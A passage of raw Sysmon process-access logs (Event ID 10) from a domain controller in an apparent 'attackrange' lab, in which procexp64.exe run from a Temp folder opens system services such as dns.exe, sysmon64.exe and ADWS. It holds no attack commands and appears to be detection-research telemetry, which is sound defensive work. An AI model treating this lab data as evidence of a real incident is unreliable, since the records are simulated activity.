emp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788383Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788382Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788381Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788380Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788379Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788378Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788377Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788376Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788375Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788374Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788373Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788372Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788371Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788370Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788369Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788368Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788367Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788366Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:20.955{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KE